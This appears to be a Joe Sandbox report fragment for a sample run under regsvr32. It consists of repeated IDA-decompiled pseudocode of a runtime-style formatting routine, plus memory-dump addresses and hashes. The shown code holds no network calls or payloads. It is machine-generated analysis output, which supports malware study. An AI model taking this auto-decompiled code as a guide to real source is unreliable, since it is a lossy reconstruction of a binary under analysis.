                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001b9ab;
                                                                      				if (_t110 == 0) goto 0x8001b914;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001b9ff;
                                                                      				if (_t111 == 0) goto 0x8001b983;
                                                                      				if (_t111 == 0) goto 0x8001b95c;
                                                                      				if (_t111 == 0) goto 0x8001b9ff;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001b9cb;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001b946;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001b946;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001ba2a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001ba41;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001b97d;
                                                                      				goto 0x8001b92f;
                                                                      				goto 0x8001b92f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001b9a5;
                                                                      				goto 0x8001b92f;
                                                                      				goto 0x8001b92f;
                                                                      				if (_t118 == 0) goto 0x8001b914;
                                                                      				if (_t118 == 0) goto 0x8001b914;
                                                                      				if (_t118 == 0) goto 0x8001b914;
                                                                      				goto 0x8001b902;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t140,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t156);
                                                                      				goto 0x8001ba94;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001ba22;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001b92f;
                                                                      				goto 0x8001b92f;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				_t51 = _t133 + 0x50; // 0xc8
                                                                      				E0000000118001A174(_t133, _t51,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001ba4a;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001ba64;
                                                                      				E000000011800246D4(0, _t133, _t149);
                                                                      				goto 0x8001ba6b;
                                                                      				E00000001180024750( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133);
                                                                      				if (0 == 0) goto 0x8001ba92;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001ba84;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001ba92;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x18001b8c4
                                                                      0x18001b8c9
                                                                      0x18001b8ce
                                                                      0x18001b8d8
                                                                      0x18001b8db
                                                                      0x18001b8de
                                                                      0x18001b8e1
                                                                      0x18001b8e4
                                                                      0x18001b8ea
                                                                      0x18001b8ec
                                                                      0x18001b8ee
                                                                      0x18001b8f7
                                                                      0x18001b900
                                                                      0x18001b905
                                                                      0x18001b90e
                                                                      0x18001b914
                                                                      0x18001b91c
                                                                      0x18001b936
                                                                      0x18001b93b
                                                                      0x18001b943
                                                                      0x18001b94a
                                                                      0x18001b950
                                                                      0x18001b957
                                                                      0x18001b964
                                                                      0x18001b974
                                                                      0x18001b97b
                                                                      0x18001b981
                                                                      0x18001b98b
                                                                      0x18001b995
                                                                      0x18001b99c
                                                                      0x18001b9a3
                                                                      0x18001b9a9
                                                                      0x18001b9ae
                                                                      0x18001b9b7
                                                                      0x18001b9c0
                                                                      0x18001b9c6
                                                                      0x18001b9cb
                                                                      0x18001b9cf
                                                                      0x18001b9d2
                                                                      0x18001b9d9
                                                                      0x18001b9dd
                                                                      0x18001b9e8
                                                                      0x18001b9ed
                                                                      0x18001b9f3
                                                                      0x18001b9fa
                                                                      0x18001ba07
                                                                      0x18001ba17
                                                                      0x18001ba19
                                                                      0x18001ba1d
                                                                      0x18001ba25
                                                                      0x18001ba35
                                                                      0x18001ba38
                                                                      0x18001ba3c
                                                                      0x18001ba44
                                                                      0x18001ba46
                                                                      0x18001ba4a
                                                                      0x18001ba4e
                                                                      0x18001ba58
                                                                      0x18001ba5d
                                                                      0x18001ba62
                                                                      0x18001ba66
                                                                      0x18001ba73
                                                                      0x18001ba79
                                                                      0x18001ba82
                                                                      0x18001ba84
                                                                      0x18001ba8c
                                                                      0x18001ba8f
                                                                      0x18001baa8

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0375a9b9c90320c76b0d4df1126070cf2936b344dbef6d7b73460371ff6489f2
                                                                      • Instruction ID: 089878a2248fd29a25ac750f404d270b2cdfa1bbb24a1dd4d831c5cc0f419de6
                                                                      • Opcode Fuzzy Hash: 0375a9b9c90320c76b0d4df1126070cf2936b344dbef6d7b73460371ff6489f2
                                                                      • Instruction Fuzzy Hash: A951C077614E5882E7AA8F28C1543BC37A4E759BA8F148109EF4697799CF30CE4AC780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E000000011800278FC(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t140;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      				void* _t156;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x800279e3;
                                                                      				if (_t110 == 0) goto 0x8002794c;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x80027a37;
                                                                      				if (_t111 == 0) goto 0x800279bb;
                                                                      				if (_t111 == 0) goto 0x80027994;
                                                                      				if (_t111 == 0) goto 0x80027a37;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x80027a03;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8002797e;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8002797e;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x80027a62;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x80027a79;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x800279b5;
                                                                      				goto 0x80027967;
                                                                      				goto 0x80027967;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x800279dd;
                                                                      				goto 0x80027967;
                                                                      				goto 0x80027967;
                                                                      				if (_t118 == 0) goto 0x8002794c;
                                                                      				if (_t118 == 0) goto 0x8002794c;
                                                                      				if (_t118 == 0) goto 0x8002794c;
                                                                      				goto 0x8002793a;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t140,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t156);
                                                                      				goto 0x80027acc;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x80027a5a;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x80027967;
                                                                      				goto 0x80027967;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				_t51 = _t133 + 0x50; // 0xc8
                                                                      				E0000000118001A174(_t133, _t51,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x80027a82;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x80027a9c;
                                                                      				E00000001180028298(0, _t133, _t149);
                                                                      				goto 0x80027aa3;
                                                                      				E00000001180028314( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133);
                                                                      				if (0 == 0) goto 0x80027aca;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x80027abc;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x80027aca;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x1800278fc
                                                                      0x180027901
                                                                      0x180027906
                                                                      0x180027910
                                                                      0x180027913
                                                                      0x180027916
                                                                      0x180027919
                                                                      0x18002791c
                                                                      0x180027922
                                                                      0x180027924
                                                                      0x180027926
                                                                      0x18002792f
                                                                      0x180027938
                                                                      0x18002793d
                                                                      0x180027946
                                                                      0x18002794c
                                                                      0x180027954
                                                                      0x18002796e
                                                                      0x180027973
                                                                      0x18002797b
                                                                      0x180027982
                                                                      0x180027988
                                                                      0x18002798f
                                                                      0x18002799c
                                                                      0x1800279ac
                                                                      0x1800279b3
                                                                      0x1800279b9
                                                                      0x1800279c3
                                                                      0x1800279cd
                                                                      0x1800279d4
                                                                      0x1800279db
                                                                      0x1800279e1
                                                                      0x1800279e6
                                                                      0x1800279ef
                                                                      0x1800279f8
                                                                      0x1800279fe
                                                                      0x180027a03
                                                                      0x180027a07
                                                                      0x180027a0a
                                                                      0x180027a11
                                                                      0x180027a15
                                                                      0x180027a20
                                                                      0x180027a25
                                                                      0x180027a2b
                                                                      0x180027a32
                                                                      0x180027a3f
                                                                      0x180027a4f
                                                                      0x180027a51
                                                                      0x180027a55
                                                                      0x180027a5d
                                                                      0x180027a6d
                                                                      0x180027a70
                                                                      0x180027a74
                                                                      0x180027a7c
                                                                      0x180027a7e
                                                                      0x180027a82
                                                                      0x180027a86
                                                                      0x180027a90
                                                                      0x180027a95
                                                                      0x180027a9a
                                                                      0x180027a9e
                                                                      0x180027aab
                                                                      0x180027ab1
                                                                      0x180027aba
                                                                      0x180027abc
                                                                      0x180027ac4
                                                                      0x180027ac7
                                                                      0x180027ae0

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 474291daa440da5140de409c9ef6f2907864cb7172b674978488bbec8b9224d3
                                                                      • Instruction ID: 86d3905f84f588621b70c99c00e5b115fecea4ac4ca29b37f310e2c48cfe26cf
                                                                      • Opcode Fuzzy Hash: 474291daa440da5140de409c9ef6f2907864cb7172b674978488bbec8b9224d3
                                                                      • Instruction Fuzzy Hash: F851AF7771465886E7AB8F28C0543AC27A2E359FA8F148119EF4D1779ACF31CE89C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001DA3C(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t140;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      				void* _t156;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001db23;
                                                                      				if (_t110 == 0) goto 0x8001da8c;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001db77;
                                                                      				if (_t111 == 0) goto 0x8001dafb;
                                                                      				if (_t111 == 0) goto 0x8001dad4;
                                                                      				if (_t111 == 0) goto 0x8001db77;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001db43;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001dabe;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001dabe;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001dba2;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001dbb9;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001daf5;
                                                                      				goto 0x8001daa7;
                                                                      				goto 0x8001daa7;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001db1d;
                                                                      				goto 0x8001daa7;
                                                                      				goto 0x8001daa7;
                                                                      				if (_t118 == 0) goto 0x8001da8c;
                                                                      				if (_t118 == 0) goto 0x8001da8c;
                                                                      				if (_t118 == 0) goto 0x8001da8c;
                                                                      				goto 0x8001da7a;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t140,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t156);
                                                                      				goto 0x8001dc0c;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001db9a;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001daa7;
                                                                      				goto 0x8001daa7;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				_t51 = _t133 + 0x50; // 0x91
                                                                      				E0000000118001A174(_t133, _t51,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001dbc2;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001dbdc;
                                                                      				E00000001180026778(0, _t133, _t149);
                                                                      				goto 0x8001dbe3;
                                                                      				E000000011800267F4( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133);
                                                                      				if (0 == 0) goto 0x8001dc0a;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001dbfc;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001dc0a;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x18001da3c
                                                                      0x18001da41
                                                                      0x18001da46
                                                                      0x18001da50
                                                                      0x18001da53
                                                                      0x18001da56
                                                                      0x18001da59
                                                                      0x18001da5c
                                                                      0x18001da62
                                                                      0x18001da64
                                                                      0x18001da66
                                                                      0x18001da6f
                                                                      0x18001da78
                                                                      0x18001da7d
                                                                      0x18001da86
                                                                      0x18001da8c
                                                                      0x18001da94
                                                                      0x18001daae
                                                                      0x18001dab3
                                                                      0x18001dabb
                                                                      0x18001dac2
                                                                      0x18001dac8
                                                                      0x18001dacf
                                                                      0x18001dadc
                                                                      0x18001daec
                                                                      0x18001daf3
                                                                      0x18001daf9
                                                                      0x18001db03
                                                                      0x18001db0d
                                                                      0x18001db14
                                                                      0x18001db1b
                                                                      0x18001db21
                                                                      0x18001db26
                                                                      0x18001db2f
                                                                      0x18001db38
                                                                      0x18001db3e
                                                                      0x18001db43
                                                                      0x18001db47
                                                                      0x18001db4a
                                                                      0x18001db51
                                                                      0x18001db55
                                                                      0x18001db60
                                                                      0x18001db65
                                                                      0x18001db6b
                                                                      0x18001db72
                                                                      0x18001db7f
                                                                      0x18001db8f
                                                                      0x18001db91
                                                                      0x18001db95
                                                                      0x18001db9d
                                                                      0x18001dbad
                                                                      0x18001dbb0
                                                                      0x18001dbb4
                                                                      0x18001dbbc
                                                                      0x18001dbbe
                                                                      0x18001dbc2
                                                                      0x18001dbc6
                                                                      0x18001dbd0
                                                                      0x18001dbd5
                                                                      0x18001dbda
                                                                      0x18001dbde
                                                                      0x18001dbeb
                                                                      0x18001dbf1
                                                                      0x18001dbfa
                                                                      0x18001dbfc
                                                                      0x18001dc04
                                                                      0x18001dc07
                                                                      0x18001dc20

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e2a711338a65a10f0079dde895b6ebde7d8ce6a13fd1003c4f4bd02b85a1e454
                                                                      • Instruction ID: d1df0c23765e5fbdb9b9e669a50e4c2faf045272a9acb2c69b746ad1312fa9bc
                                                                      • Opcode Fuzzy Hash: e2a711338a65a10f0079dde895b6ebde7d8ce6a13fd1003c4f4bd02b85a1e454
                                                                      • Instruction Fuzzy Hash: 8151D177618A5CC2E7AA8F28C0943AD37B0E759B98F158116EF4617799CF34CE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001BAAC(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t140;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      				void* _t156;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001bb93;
                                                                      				if (_t110 == 0) goto 0x8001bafc;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001bbe7;
                                                                      				if (_t111 == 0) goto 0x8001bb6b;
                                                                      				if (_t111 == 0) goto 0x8001bb44;
                                                                      				if (_t111 == 0) goto 0x8001bbe7;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001bbb3;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001bb2e;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001bb2e;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001bc12;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001bc29;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001bb65;
                                                                      				goto 0x8001bb17;
                                                                      				goto 0x8001bb17;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001bb8d;
                                                                      				goto 0x8001bb17;
                                                                      				goto 0x8001bb17;
                                                                      				if (_t118 == 0) goto 0x8001bafc;
                                                                      				if (_t118 == 0) goto 0x8001bafc;
                                                                      				if (_t118 == 0) goto 0x8001bafc;
                                                                      				goto 0x8001baea;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t140,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t156);
                                                                      				goto 0x8001bc7c;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001bc0a;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001bb17;
                                                                      				goto 0x8001bb17;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				E0000000118001A174(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001bc32;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001bc4c;
                                                                      				E000000011800247CC(_t133, _t149);
                                                                      				goto 0x8001bc53;
                                                                      				E00000001180024878( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x8001bc7a;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001bc6c;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001bc7a;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x18001baac
                                                                      0x18001bab1
                                                                      0x18001bab6
                                                                      0x18001bac0
                                                                      0x18001bac3
                                                                      0x18001bac6
                                                                      0x18001bac9
                                                                      0x18001bacc
                                                                      0x18001bad2
                                                                      0x18001bad4
                                                                      0x18001bad6
                                                                      0x18001badf
                                                                      0x18001bae8
                                                                      0x18001baed
                                                                      0x18001baf6
                                                                      0x18001bafc
                                                                      0x18001bb04
                                                                      0x18001bb1e
                                                                      0x18001bb23
                                                                      0x18001bb2b
                                                                      0x18001bb32
                                                                      0x18001bb38
                                                                      0x18001bb3f
